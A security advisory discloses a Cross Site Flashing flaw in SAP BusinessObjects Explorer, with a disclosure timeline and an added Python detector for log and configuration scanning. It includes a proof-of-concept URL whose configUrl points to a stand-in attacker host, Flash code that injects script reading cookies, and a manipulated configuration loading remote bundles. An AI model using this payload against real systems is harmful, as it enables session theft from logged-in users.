#######################################################################
# http://www.csnc.ch/en/downloads/advisories.html
#######################################################################
# Product: BusinessObjects Explorer
# Vendor: SAP AG
# Subject: Cross Site Flashing
# Risk: High
# Effect: Remotely exploitable
# Author: Stefan Horlacher
# Date: 2014-10-10
# SAP Security Note: 1908647 [0]
#######################################################################

BusinessObjects Explorer is vulnerable to Cross Site Flashing [1]
attacks, allowing an attacker to, for example, steal the victim's session.
Exploitation requires the victim to click on a malicious link prepared
by the attacker.

SAP BusinessObjects Explorer version 14.0.5 (build 882)
Not tested:
Other versions of BusinessObjects Explorer

Technical Description:
The Flash file suffers from a Cross Site Flashing vulnerability. It is
possible to directly load and display the
com_businessobjects_polestar_bootstrap.swf Flash file and to specify a
configUrl. This requires the victim to be logged in, and the attacker
needs to know the /webres/ URL, which is known as soon as the attacker
is in possession of valid credentials. The configuration file given in
the configUrl parameter may reside on a foreign host, and the
configuration file itself may contain URLs of further Flash files
residing on a foreign domain. If successful, the victim loads foreign
Flash files, which leads to Cross Site Flashing. The example below loads
a Flash file that injects JavaScript into the DOM of the originating
domain.

URL: /explorer/webres/[CUT BY COMPASS]/com_businessobjects_polestar_bootstrap.swf?configUrl=http://example.com/attacker_flash_config.xml

Code of the injected Flash file referenced in http://example.com/attacker_flash_config.xml:

package {
    import flash.display.Sprite;
    import flash.events.Event;
    import flash.external.ExternalInterface;

    public class Main extends Sprite {
        public function Main():void {
            // Calls into the JavaScript of the page embedding the SWF
            ExternalInterface.call("document.write",
                "<script>alert(document.cookie)</script>");
        }
    }
}

Extract of the manipulated configuration file http://example.com/attacker_flash_config.xml:

<p:configuration xmlns:p="http://www.businessobjects.com/2007/platform">
  <p:splashLocation p:id="com_businessobjects_polestar_splashscreen"
      p:codebase="http://[CUT BY COMPASS].csnc.ch/[CUT BY COMPASS]/"/>
  <p:bundle p:id="com_businessobjects_polestar_admin" p:codebase="http://example.com/"/>
  <p:bundle p:id="com_businessobjects_polestar_prompts" p:codebase="http://example.com/"/>
  <p:bundle p:id="com_businessobjects_polestar_dataprovider_xl" p:codebase="http://example.com/"/>
  <p:bundle p:id="com_businessobjects_polestar_portal_logoff" p:codebase="http://example.com/"/>

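The two ingredients of this issue are an off-origin configUrl on the bootstrap.swf request and off-origin p:codebase attributes inside the configuration it fetches. The following Python script is an added example written for this page, not code from Compass Security or SAP: it flags both conditions, once as a check over web server access log lines (for detection or for a WAF-style rule) and once as a validation pass over a configuration document. The trusted host name, the log lines and the sample configuration are constructed for the example; the element and attribute names follow the extract above.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlparse, parse_qs

# Assumed origin of the Explorer deployment (constructed value for this example).
TRUSTED_HOST = "explorer.example.org"
PLATFORM_NS = "http://www.businessobjects.com/2007/platform"
BOOTSTRAP_SWF = "com_businessobjects_polestar_bootstrap.swf"

def is_same_origin(url, trusted_host=TRUSTED_HOST):
    """Accept only relative URLs or absolute http(s) URLs on the trusted host.
    Protocol-relative (//host/...) and userinfo tricks (host@evil) both fail
    this check because urlparse reports the real network location."""
    parsed = urlparse(url)
    if parsed.scheme == "" and parsed.netloc == "":
        return True  # relative path: resolved against the origin that served the SWF
    return parsed.scheme in ("http", "https") and parsed.hostname == trusted_host

def foreign_config_url(request_target, trusted_host=TRUSTED_HOST):
    """Return the off-origin configUrl value of a bootstrap.swf request, or None."""
    parsed = urlparse(request_target)
    if not parsed.path.endswith(BOOTSTRAP_SWF):
        return None
    for key, values in parse_qs(parsed.query).items():
        if key.lower() != "configurl":  # the advisory spells it both ways
            continue
        for value in values:
            if not is_same_origin(value, trusted_host):
                return value
    return None

_REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def scan_access_log(lines, trusted_host=TRUSTED_HOST):
    """Return (line number, foreign configUrl) for every suspicious request."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = _REQUEST_RE.search(line)
        if match:
            foreign = foreign_config_url(match.group(1), trusted_host)
            if foreign is not None:
                findings.append((number, foreign))
    return findings

def foreign_codebases(config_xml, trusted_host=TRUSTED_HOST):
    """Return (p:id, p:codebase) for every element whose codebase is off-origin."""
    root = ET.fromstring(config_xml)
    findings = []
    for elem in root.iter():
        codebase = elem.get("{%s}codebase" % PLATFORM_NS)
        if codebase is not None and not is_same_origin(codebase, trusted_host):
            findings.append((elem.get("{%s}id" % PLATFORM_NS), codebase))
    return findings

# Constructed log lines: one benign request, one with an off-origin configUrl.
SAMPLE_LOG = [
    '10.0.0.5 - alice [10/Oct/2014:10:00:01 +0200] "GET /explorer/webres/1234/'
    'com_businessobjects_polestar_bootstrap.swf?configUrl=/explorer/webres/1234/config.xml HTTP/1.1" 200 5120',
    '10.0.0.5 - alice [10/Oct/2014:10:00:09 +0200] "GET /explorer/webres/1234/'
    'com_businessobjects_polestar_bootstrap.swf?configUrl=http://attacker.example/cfg.xml HTTP/1.1" 200 5120',
]

# Constructed configuration in the shape of the advisory's extract.
SAMPLE_CONFIG = """<p:configuration xmlns:p="http://www.businessobjects.com/2007/platform">
  <p:splashLocation p:id="com_businessobjects_polestar_splashscreen"
      p:codebase="//attacker.example/splash/"/>
  <p:bundle p:id="com_businessobjects_polestar_admin" p:codebase="/explorer/webres/1234/"/>
  <p:bundle p:id="com_businessobjects_polestar_prompts" p:codebase="http://attacker.example/"/>
</p:configuration>"""

if __name__ == "__main__":
    for number, url in scan_access_log(SAMPLE_LOG):
        print("log line %d: off-origin configUrl %s" % (number, url))
    for bundle_id, codebase in foreign_codebases(SAMPLE_CONFIG):
        print("config: %s loads from %s" % (bundle_id, codebase))
```

The same-origin test deliberately treats only relative references as safe; an allowlist of additional hosts can be substituted for the single trusted host where a deployment legitimately serves bundles from a CDN.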
2013-06-06: Discovery by Stefan Horlacher
2013-06-26: Initial vendor notification
2013-12-10: Vendor releases patch and SAP Security Note 1908647
2014-10-10: Disclosure of the advisory
[0] https://service.sap.com/sap/support/notes/1908647
[1] https://www.owasp.org/index.php/Category:OWASP_Flash_Security_Project